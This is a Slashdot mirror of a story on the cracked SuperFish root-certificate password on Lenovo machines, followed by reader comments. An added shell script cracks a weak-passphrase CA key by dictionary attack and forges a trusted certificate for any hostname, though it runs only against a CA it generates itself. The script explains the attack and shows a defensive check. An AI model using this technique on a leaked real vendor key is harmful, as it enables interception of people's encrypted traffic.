Slashdot Mirror


Superfish Security Certificate Password Cracked, Creating New Attack Vector

In a followup to today's news about junk software included with Lenovo computers, an anonymous reader writes: Robert Graham at Errata Security has published an article describing how he extracted the private key of the SuperFish self-signed root certificate from the adware that has caused Chinese computer manufacturer Lenovo such embarrassment over the last day. Since SuperFish already carries out man-in-the-middle interception of secure connections on the Lenovo machines that trust the certificate, disclosure of the password protecting that key presents hackers with 'a pre-installed hacking environment' that would be difficult to arrange by other means: anyone holding the key can sign a certificate for any site, and every affected machine will accept it. The password, "komodia," is also the name of the Komodia Redirector framework, which lets its clients manipulate TCP/IP network sessions "with a few simple clicks."
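The attack vector the summary describes, as an added example that is not from the Slashdot story, Robert Graham's write-up, or any Lenovo/SuperFish/Komodia code: a root CA whose private key is guarded only by a guessable passphrase, a dictionary attack that recovers it, and a forged leaf certificate for an arbitrary host that a client trusting that root will accept. The script generates its own throwaway "vendor" root CA with openssl (the real SuperFish key is not included), the wordlist is constructed here with "komodia" as the passphrase reported in the story, and the hostname www.example.com is an assumption.

```shell
#!/bin/sh
# Added example, not code from the original story. Requires the openssl CLI.
# Stand-in for the SuperFish case: a self-signed root CA whose private key is
# protected by a weak passphrase. We generate a throwaway CA here so it runs offline.
set -eu

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Minimal req config so the script does not depend on the system openssl.cnf.
cat > "$WORK/req.cnf" <<'EOF'
[ req ]
distinguished_name = dn
x509_extensions = v3_ca
prompt = no
[ dn ]
CN = Stand-in Vendor Root CA
[ v3_ca ]
basicConstraints = critical, CA:TRUE
keyUsage = critical, keyCertSign, cRLSign
subjectKeyIdentifier = hash
EOF

# 1. Throwaway "vendor" root CA; the private key is encrypted with the weak
#    passphrase "komodia" (the value reported in the story; CA itself is ours).
make_vendor_ca() {
  openssl genrsa -aes256 -passout pass:komodia -out "$WORK/ca.key" 2048 2>/dev/null
  openssl req -x509 -new -config "$WORK/req.cnf" -key "$WORK/ca.key" \
    -passin pass:komodia -days 30 -out "$WORK/ca.crt" 2>/dev/null
}

# 2. Dictionary attack on an extracted encrypted key: try each candidate
#    passphrase; print the one that decrypts the key, return 1 if none does.
crack_key_password() {
  key="$1"; wordlist="$2"
  while IFS= read -r candidate; do
    [ -n "$candidate" ] || continue
    if openssl pkey -in "$key" -passin "pass:$candidate" -noout >/dev/null 2>&1; then
      printf '%s\n' "$candidate"
      return 0
    fi
  done < "$wordlist"
  return 1
}

# 3. With the recovered passphrase, mint a leaf certificate for any hostname
#    and sign it with the vendor root. This is what the MITM proxy does per site.
forge_leaf_cert() {
  host="$1"; password="$2"
  openssl genrsa -out "$WORK/leaf.key" 2048 2>/dev/null
  openssl req -new -config "$WORK/req.cnf" -key "$WORK/leaf.key" \
    -subj "/CN=$host" -out "$WORK/leaf.csr" 2>/dev/null
  printf 'subjectAltName=DNS:%s\n' "$host" > "$WORK/san.ext"
  openssl x509 -req -in "$WORK/leaf.csr" -CA "$WORK/ca.crt" -CAkey "$WORK/ca.key" \
    -passin "pass:$password" -CAcreateserial -days 7 -extfile "$WORK/san.ext" \
    -out "$WORK/leaf.crt" 2>/dev/null
}

# 4. Would a client that trusts the vendor root accept the forged cert for
#    this hostname? Exit status 0 means yes.
leaf_chains_to_vendor_root() {
  openssl verify -CAfile "$WORK/ca.crt" -verify_hostname "$1" "$WORK/leaf.crt" >/dev/null 2>&1
}

# End-to-end run; prints the recovered passphrase on success.
demo() {
  make_vendor_ca
  # Constructed wordlist; a real run would use a proper list (or just the vendor's name).
  printf '%s\n' password 123456 lenovo superfish komodia > "$WORK/words.txt"
  found="$(crack_key_password "$WORK/ca.key" "$WORK/words.txt")" || return 1
  forge_leaf_cert "www.example.com" "$found"
  leaf_chains_to_vendor_root "www.example.com" && printf '%s\n' "$found"
}

pw="$(demo)"
printf 'passphrase recovered: %s; forged www.example.com certificate verifies against the vendor root\n' "$pw"
```

The point of step 4 is that the verification is done against the vendor root only: a machine that ships with such a root in its trust store and an interception proxy holding the key behaves exactly like this for every site, and once the key and its passphrase are public, so can anyone on the same network. The same `openssl verify -CAfile` check is a quick way to confirm whether a certificate you see in the wild chains to a vendor root you have exported from an affected machine.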

6 of 144 comments

  1. Re:Can Lenovo Be Sued? by Anonymous Coward · · Score: 4, Insightful

    Of course they can be sued. Can you actually win? Probably not. I would assume there's some agreement somewhere when you unwrap the computer saying you accept the software that's installed.

  2. Soo soo tired..... by dablow · · Score: 4, Insightful

    Anybody else who works in IT starting to get depressed?

    I am just soo tired of trying to keep up with all the hacking, spying & stealing going on...

    Constantly feeling attacked from all sides (gov, corporations etc.)

    Who can you even trust anymore?

    I would like to take a more active role in protecting my privacy and personal data; however, I do not see how this is possible without completely abandoning all electronic gadgets and the internet.

    1. Re:Soo soo tired..... by webanish · · Score: 3, Insightful

      Between ignorance and despair is action...
      Start down that road, and you'll discover many a companion. Don't lose hope.

      Here's one example. I'm sure there would be many others.

  3. No words by WaffleMonster · · Score: 5, Insightful

    Preloading advertising spyware with a new computer while knowingly disabling all https and code signing security.

    There is selfish, there is stupid, there is dumb and there is criminal batshit insanity.

    Having been a fan of Lenovo for years I sincerely hope they are sued into oblivion and face criminal prosecution. No need wasting your time wondering if I will ever buy anything from them again.

    1. Re:No words by SoCalChris · · Score: 4, Insightful

      Yes, this is monumentally stupid on their part. But I'll be shocked if there are any real consequences for it. The other manufacturers are all watching to see how much backlash there is, and how quickly people forget and move on, to see if this is something they'll want to do in the future as well. Consumers won't care about this, and business will carry on as usual soon enough.

  4. LOL by Anonymous Coward · · Score: 0, Insightful

    *all* the words? Are you retarded? All hard drives are vulnerable and there is not even ONE mention of "hard drive" in the summary?

    Fuck off. You can't spin this shit. The story kept getting deleted, this OP went from "Score:1, Interesting" to "Score:0, Offtopic".

    There are special teams in NSA/GCHQ hired to monitor all major sites and discussion boards and control their narratives. Don't act stupid and pretend they don't exist here.